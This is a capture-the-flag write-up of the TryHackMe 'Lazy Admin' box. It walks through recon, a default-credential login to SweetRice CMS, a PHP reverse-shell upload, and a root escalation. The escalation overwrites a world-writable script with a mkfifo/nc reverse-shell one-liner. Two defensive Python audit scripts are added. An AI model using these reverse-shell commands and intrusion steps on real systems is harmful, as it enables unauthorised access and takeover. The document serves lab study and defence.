💭 Thoughts after doing the room

I didn’t explore all attack vectors in this room. On the TryHackMe page, the only information given was “Have some fun! There might be multiple ways to get user access.” I think I used the most common method.

The Sweet-Rice CMS was quite exotic, so when I googled it, I found more TryHackMe write-ups than CMS documentation to get the default password. As for the root part, I enjoyed the challenge of having to discover that www-data had access to another home directory.

Overall, it was pretty straightforward, but not very exciting. I think it would have been more enjoyable if I hadn’t googled for exploits of that version. Then, I would have had to find my own way into the machine.

Task 1: Lazy Admin

What is the user flag?

No hints and no other text are provided, so I try an nmap default scan first:

root@ip-10-10-123-222:~# IP=
root@ip-10-10-123-222:~# nmap -T4 $IP

Starting Nmap 7.60 ( ) at 2023-04-02 20:41 BST
Nmap scan report for (
Host is up (0.0011s latency).
Not shown: 998 closed ports
22/tcp open  ssh
80/tcp open  http
MAC Address: 02:DF:1D:DF:D1:75 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.66 seconds

Checking the webpage, it’s just a default Apache site. Further information gathering with nmap:

root@ip-10-10-123-222:~# nmap -p80 -sV -sC $IP

Starting Nmap 7.60 ( ) at 2023-04-02 20:43 BST
Nmap scan report for (
Host is up (0.00019s latency).

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 02:DF:1D:DF:D1:75 (Unknown)

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 7.79 seconds

Brute-forcing the HTTP server with a common wordlist to see if there is anything:

root@ip-10-10-123-222:~# gobuster dir --url $IP -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2023/04/02 20:46:29 Starting gobuster
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/.hta (Status: 403)
/content (Status: 301)
/index.html (Status: 200)
/server-status (Status: 403)
2023/04/02 20:46:33 Finished

/content looks interesting. It shows this page

It shows that it’s powered by SweetRice, and the page looks like it has just been set up. So I’ll google for default credentials and the path to the admin interface first.

Google shows the password as a text snippet before I visit any page. Almost all search results are TryHackMe write-ups ^^ so I don’t click one, to avoid spoilers.

I can log in successfully with the credentials. I see that it runs version 1.5.1.

First I enable the site as described on the first landing page I saw.

to check if it renders. I could try to find a way to upload a file manually now. But first I try googling “SweetRice exploit 1.5.1”; the first entry was SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution, which says that it’s possible to upload a file in the Ads section. So I upload the popular PHP one from PentestMonkey. The ExploitDB entry also gives the location of the uploaded script.

So I start a listener with nc and access the URL in the browser like this:

root@ip-10-10-123-222:~# nc -nvlp 1337
Listening on [] (family 0, port 1337)
Connection from 38976 received!
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
 23:28:37 up 49 min,  0 users,  load average: 0.12, 0.04, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh: 0: can't access tty; job control turned off
$ whoami
$ pwd
$ cat /etc/passwd 
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
$ find / -name user.txt 2>/dev/null 
$ cat /home/itguy/user.txt

I first checked which user I’m logged in as, then looked at the passwd file to see the users; the one with UID 1000 is interesting. But I then decided to just search for the user flag by its commonly known filename.

The 2>/dev/null is there to avoid permission errors cluttering the result: the errors are written to /dev/null instead of to the screen.
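Reading /etc/passwd by eye for the one interesting UID works on a small box, but it is the kind of check worth automating on a hardening pass. The following is an added example (not part of the write-up) that parses passwd(5) lines and separates regular interactive accounts from system accounts that still have a login shell. The sample is constructed: it reuses a few service lines from the output above and adds a hypothetical itguy entry with UID 1000 to stand in for the home directory found on the machine.

```python
"""Audit /etc/passwd for accounts that can actually log in.

Added example, not from the original write-up. The sample below is constructed:
service entries from the box plus a hypothetical 'itguy' line (UID 1000).
"""
from dataclasses import dataclass
from typing import List

# Shells that refuse interactive login.
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false"}


@dataclass(frozen=True)
class PasswdEntry:
    name: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> List[PasswdEntry]:
    """Parse passwd(5) lines: name:password:UID:GID:GECOS:home:shell."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, _password, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, int(uid), int(gid), gecos, home, shell))
    return entries


def interactive_accounts(entries: List[PasswdEntry], min_uid: int = 1000,
                         max_uid: int = 60000) -> List[PasswdEntry]:
    """Regular-user UID range (Debian/Ubuntu default 1000..60000) with a real shell."""
    return [e for e in entries
            if min_uid <= e.uid <= max_uid and e.shell not in NOLOGIN_SHELLS]


def login_capable_system_accounts(entries: List[PasswdEntry],
                                  min_uid: int = 1000) -> List[PasswdEntry]:
    """System accounts (UID below the regular range, root included) that keep a
    real shell. Anything here besides root deserves a second look."""
    return [e for e in entries if e.uid < min_uid and e.shell not in NOLOGIN_SHELLS]


# Constructed sample: service lines from the write-up plus a hypothetical itguy entry.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
itguy:x:1000:1000:itguy,,,:/home/itguy:/bin/bash
"""

if __name__ == "__main__":
    parsed = parse_passwd(SAMPLE_PASSWD)
    for e in interactive_accounts(parsed):
        print(f"interactive user: {e.name} uid={e.uid} home={e.home} shell={e.shell}")
    for e in login_capable_system_accounts(parsed):
        print(f"system account with shell: {e.name} uid={e.uid} shell={e.shell}")
```

On a real host, feed it the contents of /etc/passwd; the interactive list is where user flags (and user data) live, and the second list is the one a defender wants to keep as short as possible.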

What is the root flag?

Now I’ll check sudo privileges, as usual.

$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/

It shows that I can use perl as root but just for the file /home/itguy/

This probably requires doing more in the terminal session, so I’ll upgrade to a better shell. I check with which python whether python exists and then execute

python -c 'import pty;pty.spawn("/bin/bash")'

I print the Perl script:

www-data@THM-Chal:/home/itguy$ cat

system("sh", "/etc/");

I check the permissions for

www-data@THM-Chal:/etc$ stat
  File: ''
  Size: 81        	Blocks: 8          IO Block: 4096   regular file
Device: ca01h/51713d	Inode: 1050508     Links: 1
Access: (0647/-rw-r--rwx)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2023-04-02 23:44:27.980000000 +0300
Modify: 2019-11-29 13:45:39.542648714 +0200
Change: 2019-11-29 13:45:39.542648714 +0200
 Birth: -

I see that it’s writable by anyone: the mode 0647 gives everyone else read, write and execute permission on a root-owned file.

www-data@THM-Chal:/etc$ cat
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 5554 >/tmp/f

If I output the file it conveniently already contains a reverse shell, just with the wrong IP.
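The root step above is a chain rather than a single bug: a sudo rule lets www-data run perl on a root-owned script without a password, and that script hands a second file to sh, a file that anyone can overwrite. The following is an added example (not part of the write-up and not a tool it uses) that audits exactly that chain from the defender's side: it parses the "may run" lines of sudo -l output, follows system("sh", "...") calls in the Perl script, and reports files in the chain that are world-writable, group-writable or not owned by the expected user. The demo layout it builds is constructed; backup.pl and copy.sh are hypothetical stand-ins for the file names the write-up does not show, while the mode 0647 and the system("sh", ...) call are taken from the output above.

```python
"""Audit sudo NOPASSWD interpreter rules whose command chain reaches a writable file.

Added example, not from the write-up or any real tool. File names backup.pl and
copy.sh are hypothetical placeholders; mode 0647 and system("sh", ...) come
from the box as shown in the write-up.
"""
import os
import re
import stat
import tempfile
from typing import Dict, List, Tuple

# A rule line from the "may run the following commands" section of `sudo -l`,
# e.g. "(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl".
SUDO_RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s+(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+)$")
# A Perl system("sh", "<file>") call that hands another file to a shell.
PERL_SYSTEM_SH = re.compile(r'system\(\s*"sh"\s*,\s*"([^"]+)"\s*\)')


def parse_sudo_rules(text: str) -> List[dict]:
    """Extract run-as user, NOPASSWD tag, command and arguments from sudo -l output."""
    rules = []
    for line in text.splitlines():
        m = SUDO_RULE.match(line)
        if not m:
            continue  # header, Defaults and env lines do not start with "(runas)"
        parts = m.group("cmd").split()
        rules.append({"runas": m.group("runas"),
                      "nopasswd": "NOPASSWD:" in m.group("tags"),
                      "command": parts[0], "args": parts[1:]})
    return rules


def referenced_scripts(path: str) -> List[str]:
    """Files a Perl script passes to sh via system("sh", "<file>")."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return PERL_SYSTEM_SH.findall(fh.read())


def mode_findings(path: str, expected_owner: int = 0) -> List[str]:
    """Permission problems for a file that ends up executing with root privileges."""
    st = os.stat(path)
    perms = stat.S_IMODE(st.st_mode)
    problems = []
    if perms & stat.S_IWOTH:  # the 0647 case: the last digit grants write to everyone
        problems.append(f"{path}: world-writable ({stat.filemode(st.st_mode)} / {perms:04o})")
    if perms & stat.S_IWGRP:
        problems.append(f"{path}: group-writable (gid {st.st_gid})")
    if st.st_uid != expected_owner:
        problems.append(f"{path}: owned by uid {st.st_uid}, expected {expected_owner}")
    return problems


def audit_sudo_chain(sudo_output: str, expected_owner: int = 0) -> Dict[str, List[str]]:
    """For each NOPASSWD rule, check the script arguments and every file they shell out to."""
    report = {}
    for rule in parse_sudo_rules(sudo_output):
        if not rule["nopasswd"]:
            continue
        findings = []
        for script in rule["args"]:
            if not os.path.isfile(script):
                findings.append(f"{script}: referenced by sudoers but missing")
                continue
            findings.extend(mode_findings(script, expected_owner))
            for child in referenced_scripts(script):
                if os.path.isfile(child):
                    findings.extend(mode_findings(child, expected_owner))
                else:
                    findings.append(f"{child}: referenced by {script} but missing")
        report[" ".join([rule["command"], *rule["args"]])] = findings
    return report


def run_demo() -> Tuple[Dict[str, List[str]], str]:
    """Constructed reproduction of the write-up's layout in a temp dir:
    a sudo-runnable Perl script (0755) that shells out to a 0647 helper."""
    base = tempfile.mkdtemp(prefix="sudo-audit-")
    sh_path = os.path.join(base, "copy.sh")      # hypothetical name
    pl_path = os.path.join(base, "backup.pl")    # hypothetical name
    with open(sh_path, "w") as fh:
        fh.write("#!/bin/sh\necho constructed helper\n")
    os.chmod(sh_path, 0o647)                     # the mode stat showed on the box
    with open(pl_path, "w") as fh:
        fh.write(f'system("sh", "{sh_path}");\n')
    os.chmod(pl_path, 0o755)
    sudo_l = ("User www-data may run the following commands on THM-Chal:\n"
              f"    (ALL) NOPASSWD: /usr/bin/perl {pl_path}\n")
    # The demo files belong to whoever runs this, so that uid is the expected owner here;
    # against a real sudoers file the default expected_owner=0 (root) is what you want.
    return audit_sudo_chain(sudo_l, expected_owner=os.getuid()), sh_path


if __name__ == "__main__":
    report, _ = run_demo()
    for rule, findings in report.items():
        print(rule)
        for f in findings or ["no findings"]:
            print("   ", f)
```

The fix the audit points at is the obvious one: any file in a root-run chain must be owned by root and writable only by root (0755 or 0644 here), and the sudoers rule itself should be reviewed for whether www-data needs it at all.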

So I adapt it and overwrite the current contents.

www-data@THM-Chal:/etc$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4242 >/tmp/f" > /etc/

www-data@THM-Chal:/etc$ cat
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4242 >/tmp/f

Then I execute the file with sudo and perl:

www-data@THM-Chal:/home/itguy$ which perl
which perl
www-data@THM-Chal:/home/itguy$ sudo /usr/bin/perl /home/itguy/ 
sudo /usr/bin/perl /home/itguy/
rm: cannot remove '/tmp/f': No such file or directory

It executes and I get the root shell:

# whoami
# cd /root
# ls
# cat root.txt